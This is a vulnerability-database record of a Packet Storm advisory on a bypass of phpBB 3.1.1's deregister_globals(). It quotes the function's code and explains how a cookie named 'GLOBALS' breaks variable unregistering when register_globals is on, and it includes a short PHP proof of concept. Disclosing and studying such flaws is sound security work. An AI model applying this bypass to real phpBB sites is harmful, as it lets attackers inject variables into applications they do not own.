{"id": "PACKETSTORM:129274", "vendorId": null, "type": "packetstorm", "bulletinFamily": "exploit", "title": "phpBB 3.1.1 deregister_globals() Bypass", "description": "", "published": "2014-11-26T00:00:00", "modified": "2014-11-26T00:00:00", "cvss": {"vector": "NONE", "score": 0.0}, "cvss2": {}, "cvss3": {}, "href": "https://packetstormsecurity.com/files/129274/phpBB-3.1.1-deregister_globals-Bypass.html", "reporter": "Taoguang Chen", "references": [], "cvelist": [], "immutableFields": [], "lastseen": "2016-11-03T10:26:14", "viewCount": 17, "enchantments": {"score": {"value": -0.0, "vector": "NONE"}, "dependencies": {}, "backreferences": {}, "exploitation": null, "vulnersScore": -0.0}, "_state": {"dependencies": 1678912101, "score": 1678911848, "epss": 1678921929}, "_internal": {"score_hash": "f2532948a470a6060f1afd941e09cbc7"}, "sourceHref": "https://packetstormsecurity.com/files/download/129274/phpbbderegglobal-bypass.txt", "sourceData": "`When PHP's register_globals configuration directive is set on, phpBB calls \nthe deregister_globals() function, which destroys all global variables \nregistered by PHP. But the deregister_globals() function can be bypassed. \n \n``` \n$input = array_merge( \narray_keys($_GET), \narray_keys($_POST), \narray_keys($_COOKIE), \narray_keys($_SERVER), \narray_keys($_SESSION), \narray_keys($_ENV), \narray_keys($_FILES) \n); \n \nforeach ($input as $varname) \n{ \nif (isset($not_unset[$varname])) \n{ \nif ($varname !== 'GLOBALS' || isset($_GET['GLOBALS']) || \nisset($_POST['GLOBALS']) || isset($_SERVER['GLOBALS']) || \nisset($_SESSION['GLOBALS']) || isset($_ENV['GLOBALS']) || \nisset($_FILES['GLOBALS'])) \n{ \nexit; \n} \nelse \n{ \n$cookie = &$_COOKIE; \nwhile (isset($cookie['GLOBALS'])) \n{ \nif (!is_array($cookie['GLOBALS'])) \n{ \nbreak; \n} \n.... \n} \n} \nunset($GLOBALS[$varname]); \n} \n``` \n \nIn the above code we see that when the request sets $_COOKIE['GLOBALS'] = 1, \n$GLOBALS['GLOBALS'] will be destroyed by unset(). 
This means the $GLOBALS array \nwill be destroyed. This also means you will not be able to use \n$GLOBALS['key'] to access or control a global variable in all scopes \nthroughout a script, because the binding between the $GLOBALS array and the \nglobal symbol table has been broken. All global variables registered by PHP \nfrom the $_COOKIE, $_SERVER, $_SESSION, $_ENV, and $_FILES arrays will not be \nunregistered. \n \nProof of Concept \n \n``` \n$_COOKIE['GLOBALS'] = 1; \n$_COOKIE['ryat'] = $ryat = 'ryat'; \n \nderegister_globals(); \n \nvar_dump($GLOBALS); \nvar_dump($ryat); \n \n$GLOBALS['ryat'] = 'hi'; \n \nvar_dump($GLOBALS); \nvar_dump($ryat); \n``` \n \nP.S. I had reported the issue to the phpBB developers, but they do not \nconsider this a security issue. \n \n \n`\n"}